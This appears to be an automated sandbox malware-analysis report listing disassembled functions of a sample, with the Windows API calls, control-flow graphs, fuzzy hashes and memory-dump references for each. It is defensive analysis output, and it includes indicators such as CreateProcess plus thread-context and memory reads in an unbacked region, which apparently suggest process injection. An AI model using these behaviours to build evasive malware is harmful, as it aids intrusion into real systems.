                                                  Similarity
                                                  • API ID: File$Delete$Copy
                                                  • String ID:
                                                  • API String ID: 3226157194-0
                                                  • Opcode ID: e5e0bf02dcadcf1029015be6e9397c4452e4b6fc28c4abed7a7e94edcfe5e342
                                                  • Instruction ID: 8bd88c812560d1a12b7be4a17967a1525dfa0973bca76b2bd9cf12c729ef750c
                                                  • Opcode Fuzzy Hash: e5e0bf02dcadcf1029015be6e9397c4452e4b6fc28c4abed7a7e94edcfe5e342
                                                  • Instruction Fuzzy Hash: 07B15E71D4011AABDF25DBA4CC99EDFBB7DFF48350F1040A6FA09A6181EB309A448F61
                                                  Function 005C5AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1761 5c5aa9-5c5ace 1762 5c5ad7-5c5ad9 1761->1762 1763 5c5ad0-5c5ad2 1761->1763 1765 5c5afa-5c5b1f 1762->1765 1766 5c5adb-5c5af5 call 5bf2c6 call 5bf2d9 call 5c27ec 1762->1766 1764 5c5ca5-5c5cb4 call 5b0a8c 1763->1764 1768 5c5b26-5c5b2c 1765->1768 1769 5c5b21-5c5b24 1765->1769 1766->1764 1773 5c5b2e-5c5b46 call 5bf2c6 call 5bf2d9 call 5c27ec 1768->1773 1774 5c5b4b 1768->1774 1769->1768 1772 5c5b4e-5c5b53 1769->1772 1777 5c5b64-5c5b6d call 5c564e 1772->1777 1778 5c5b55-5c5b61 call 5c9424 1772->1778 1806 5c5c9c-5c5c9f 1773->1806 1774->1772 1789 5c5b6f-5c5b71 1777->1789 1790 5c5ba8-5c5bba 1777->1790 1778->1777 1794 5c5b95-5c5b9e call 5c542e 1789->1794 1795 5c5b73-5c5b78 1789->1795 1792 5c5bbc-5c5bc2 1790->1792 1793 5c5c02-5c5c23 WriteFile 1790->1793 1797 5c5bc4-5c5bc7 1792->1797 1798 5c5bf2-5c5c00 call 5c56c4 1792->1798 1801 5c5c2e 1793->1801 1802 5c5c25-5c5c2b GetLastError 1793->1802 1805 5c5ba3-5c5ba6 1794->1805 1799 5c5c6c-5c5c7e 1795->1799 1800 5c5b7e-5c5b8b call 5c55e1 1795->1800 1808 5c5bc9-5c5bcc 1797->1808 1809 5c5be2-5c5bf0 call 5c5891 1797->1809 1798->1805 1812 5c5c89-5c5c99 call 5bf2d9 call 5bf2c6 1799->1812 1813 5c5c80-5c5c83 1799->1813 1814 5c5b8e-5c5b90 1800->1814 1807 5c5c31-5c5c3c 1801->1807 1802->1801 1805->1814 1819 5c5ca4 1806->1819 1816 5c5c3e-5c5c43 1807->1816 1817 5c5ca1 1807->1817 1808->1799 1818 5c5bd2-5c5be0 call 5c57a3 1808->1818 1809->1805 1812->1806 1813->1812 1823 5c5c85-5c5c87 1813->1823 1814->1807 1825 5c5c69 1816->1825 1826 5c5c45-5c5c4a 1816->1826 1817->1819 1818->1805 1819->1764 1823->1819 1825->1799 1830 5c5c4c-5c5c5e call 5bf2d9 call 5bf2c6 1826->1830 1831 5c5c60-5c5c67 call 5bf2a3 1826->1831 1830->1806 1831->1806
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: JOY
                                                  • API String ID: 0-3877268382
                                                  • Opcode ID: bbbef1843c5376be108cbbcddcfea95bb70fa7a1f6834556eddf13cf39999b4b
                                                  • Instruction ID: 15b5e4b09fa48441ed0c48ccc386f69c0a232c19c181091166a4826616c3eac8
                                                  • Opcode Fuzzy Hash: bbbef1843c5376be108cbbcddcfea95bb70fa7a1f6834556eddf13cf39999b4b
                                                  • Instruction Fuzzy Hash: BA519B75900A0AAECB219FE4CD49FEEBFB8FF45314F14045DE405A7291E671AD818B61
                                                  Function 00593B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1876 593b1c-593b27 1877 593b99-593b9b 1876->1877 1878 593b29-593b2e 1876->1878 1879 593b8c-593b8f 1877->1879 1878->1877 1880 593b30-593b48 RegOpenKeyExW 1878->1880 1880->1877 1881 593b4a-593b69 RegQueryValueExW 1880->1881 1882 593b6b-593b76 1881->1882 1883 593b80-593b8b RegCloseKey 1881->1883 1884 593b78-593b7a 1882->1884 1885 593b90-593b97 1882->1885 1883->1879 1886 593b7e 1884->1886 1885->1886 1886->1883
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00593B0F,SwapMouseButtons,00000004,?), ref: 00593B40
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00593B0F,SwapMouseButtons,00000004,?), ref: 00593B61
                                                  • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00593B0F,SwapMouseButtons,00000004,?), ref: 00593B83
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  • Opcode ID: 7fcfa8af53f3e7603ad1a063600ff7e35175dbe5daa611116f889b298344bfa3
                                                  • Instruction ID: 7f9410f4922ddcb2c364e261befd4a3a4b7dc6b63672aa11013b1d19e8f5f9cf
                                                  • Opcode Fuzzy Hash: 7fcfa8af53f3e7603ad1a063600ff7e35175dbe5daa611116f889b298344bfa3
                                                  • Instruction Fuzzy Hash: 00112AB5510208FFDF208FA5DC44EAEBBBAFF04754B104859A805D7210E2719E4197A0
                                                  Function 0165AC90 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 0165B44B
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0165B4E1
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0165B503
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1732028781.0000000001659000.00000040.00000020.00020000.00000000.sdmp, Offset: 01659000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1659000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                  • Instruction ID: a659b9f1dc7ebd3ab08b1ded047f3a9cae587ef6cc1f16ac37e03f101da64681
                                                  • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                  • Instruction Fuzzy Hash: C5621A30A142589BEB64CFA4CC40BEEB776EF58300F1091A9D60DEB390E7759E81CB59
                                                  Function 00592DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 005D2C8C
                                                    • Part of subcall function 00593AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00593A97,?,?,00592E7F,?,?,?,00000000), ref: 00593AC2
                                                    • Part of subcall function 00592DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00592DC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Name$Path$FileFullLongOpen
                                                  • String ID: X$`ee
                                                  • API String ID: 779396738-2358545003
                                                  • Opcode ID: fc9a4bc9f912355071a73594b751cb022cb4e0fa6bfb043463ab7634e1f44bff
                                                  • Instruction ID: 100053c153859e9f9e6a129e2944cb1637086a8920e4c003926bb8984363c83c
                                                  • Opcode Fuzzy Hash: fc9a4bc9f912355071a73594b751cb022cb4e0fa6bfb043463ab7634e1f44bff
                                                  • Instruction Fuzzy Hash: 4721A171A00258ABCF019F94C849BEE7FF9AF88305F00805AE405A7241EBB45A498FA1
                                                  Function 005AFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 005B0668
                                                    • Part of subcall function 005B32A4: RaiseException.KERNEL32(?,?,?,005B068A,?,00661444,?,?,?,?,?,?,005B068A,00591129,00658738,00591129), ref: 005B3304
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 005B0685
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                  • String ID: Unknown exception
                                                  • API String ID: 3476068407-410509341
                                                  • Opcode ID: bb6e3d0b47d5c29de34552865fbc3af14b5fe85e029f867d14623a49d7cd463c
                                                  • Instruction ID: 7f36aa44a1a91b14b2072166d6d42be25c9c30771dc5e6b32bb0a6d656990f77
                                                  • Opcode Fuzzy Hash: bb6e3d0b47d5c29de34552865fbc3af14b5fe85e029f867d14623a49d7cd463c
                                                  • Instruction Fuzzy Hash: 12F0623490020E778F15BAA4DC4ACDF7F6DBE80750B604531B914A69D2EF71FA69CA81
                                                  Function 00603017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0060302F
                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00603044
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Temp$FileNamePath
                                                  • String ID: aut
                                                  • API String ID: 3285503233-3010740371
                                                  • Opcode ID: 551b0df81595fccdfa0d82bb4a058d5d54b58e3d7522d2dab6eb810591ad490c
                                                  • Instruction ID: 24bf46b3e2feeba08d3e69509342f3732bd2ad64445131a2b16015b8e0d82fd6
                                                  • Opcode Fuzzy Hash: 551b0df81595fccdfa0d82bb4a058d5d54b58e3d7522d2dab6eb810591ad490c
                                                  • Instruction Fuzzy Hash: 0CD05E72501328A7DB30A7A4AC0EFCB3A6CDB04761F4002A1BA55E20A1DEB09A85CAD0
                                                  Function 00617F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 006182F5
                                                  • TerminateProcess.KERNEL32(00000000), ref: 006182FC
                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 006184DD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentFreeLibraryTerminate
                                                  • String ID:
                                                  • API String ID: 146820519-0
                                                  • Opcode ID: 7b608e79b01aff5a0969784813eecc54fe88444fe9c45a9daf1c61de9dc28fa8
                                                  • Instruction ID: 57c92640483a3433faac1e0a9fd95d87ac40aa1bc41dfd26d3d8ed1ec92f39c5
                                                  • Opcode Fuzzy Hash: 7b608e79b01aff5a0969784813eecc54fe88444fe9c45a9daf1c61de9dc28fa8
                                                  • Instruction Fuzzy Hash: 6D125D719083419FC714DF28C484B9ABBE6BF89314F18895DE8998B352DB31ED85CB92
                                                  Function 005910F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00591BF4
                                                    • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00591BFC
                                                    • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00591C07
                                                    • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00591C12
                                                    • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00591C1A
                                                    • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00591C22
                                                    • Part of subcall function 00591B4A: RegisterWindowMessageW.USER32(00000004,?,005912C4), ref: 00591BA2
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0059136A
                                                  • OleInitialize.OLE32 ref: 00591388
                                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 005D24AB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                  • String ID:
                                                  • API String ID: 1986988660-0
                                                  • Opcode ID: e7f35d27efe979b5f2989885c165a698b487b62265657b1df563790f08a503f6
                                                  • Instruction ID: c3002673df5e6537fcc073fb9362de843f1cbc824a56888b993cddfe1044868b
                                                  • Opcode Fuzzy Hash: e7f35d27efe979b5f2989885c165a698b487b62265657b1df563790f08a503f6
                                                  • Instruction Fuzzy Hash: EC71C8F49116028FC784DF7AA859659BEE3BB8A35471CA22ED00BCF261EBB04441CF95
                                                  Function 005FC161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00593923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00593A04
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005FC259
                                                  • KillTimer.USER32(?,00000001,?,?), ref: 005FC261
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005FC270
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer$Kill
                                                  • String ID:
                                                  • API String ID: 3500052701-0
                                                  • Opcode ID: 5905056a3c4b9945fef965ebf3f9043b46bcb1acb88f7ce521382e429a2f6434
                                                  • Instruction ID: 75ded5874fea9561ab60c2b582efa0ae6013d67bc444e7dc18acc1d7b9e794a1
                                                  • Opcode Fuzzy Hash: 5905056a3c4b9945fef965ebf3f9043b46bcb1acb88f7ce521382e429a2f6434
                                                  • Instruction Fuzzy Hash: D531C57490434CAFEB329F648955BEBBFEDAF07304F0404A9D2DAA7241C7785A85CB51
                                                  Function 005C86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNELBASE(00000000,00000000,?,?,005C85CC,?,00658CC8,0000000C), ref: 005C8704
                                                  • GetLastError.KERNEL32(?,005C85CC,?,00658CC8,0000000C), ref: 005C870E
                                                  • __dosmaperr.LIBCMT ref: 005C8739
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                  • String ID:
                                                  • API String ID: 2583163307-0
                                                  • Opcode ID: 16720663de1002826667f8df37f3c8a40c3e0974b1c4e35a379d755bd12a22ff
                                                  • Instruction ID: 6e27572dad7a56dfbb7d69693a3845d0a59e91d386d35dc81197ee6ee6473831
                                                  • Opcode Fuzzy Hash: 16720663de1002826667f8df37f3c8a40c3e0974b1c4e35a379d755bd12a22ff
                                                  • Instruction Fuzzy Hash: B6012F326055602ED72466F45849F7F6F45ABD1B74F35061DF8148B1D2EDB1ACC18150
                                                  Function 0059DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TranslateMessage.USER32(?), ref: 0059DB7B
                                                  • DispatchMessageW.USER32(?), ref: 0059DB89
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0059DB9F
                                                  • Sleep.KERNEL32(0000000A), ref: 0059DBB1
                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 005E1CC9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                  • String ID:
                                                  • API String ID: 3288985973-0
                                                  • Opcode ID: a536d47e38a4d31c3371953b09fb6d5f5ab981831293abdff46230682059ca26
                                                  • Instruction ID: eb807aa41b1e725ba5f4a154a6e0711c71e3e74da6d16ac5c04dc08c2886c2e4
                                                  • Opcode Fuzzy Hash: a536d47e38a4d31c3371953b09fb6d5f5ab981831293abdff46230682059ca26
                                                  • Instruction Fuzzy Hash: 27F05E306447809BEB34CB608C49FAA7BBAFB85350F105A19E64AD70C0DB3494898B25
                                                  Function 00602FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00602CD4,?,?,?,00000004,00000001), ref: 00602FF2
                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00602CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00603006
                                                  • CloseHandle.KERNEL32(00000000,?,00602CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0060300D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleTime
                                                  • String ID:
                                                  • API String ID: 3397143404-0
                                                  • Opcode ID: 62c4548f2b7254194b89f37a898dae9b6d661e9e2627e6f868460c2bcf393e99
                                                  • Instruction ID: 9d217300ec5ad92442902e5f85d5b3e41016f75a88b1ed9124570ef33fec7032
                                                  • Opcode Fuzzy Hash: 62c4548f2b7254194b89f37a898dae9b6d661e9e2627e6f868460c2bcf393e99
                                                  • Instruction Fuzzy Hash: 8FE08636281B2077D3341755BC0EFCF3A1DD786B75F104210FB19751D046A0151242A8
                                                  Function 005A1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 005A17F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
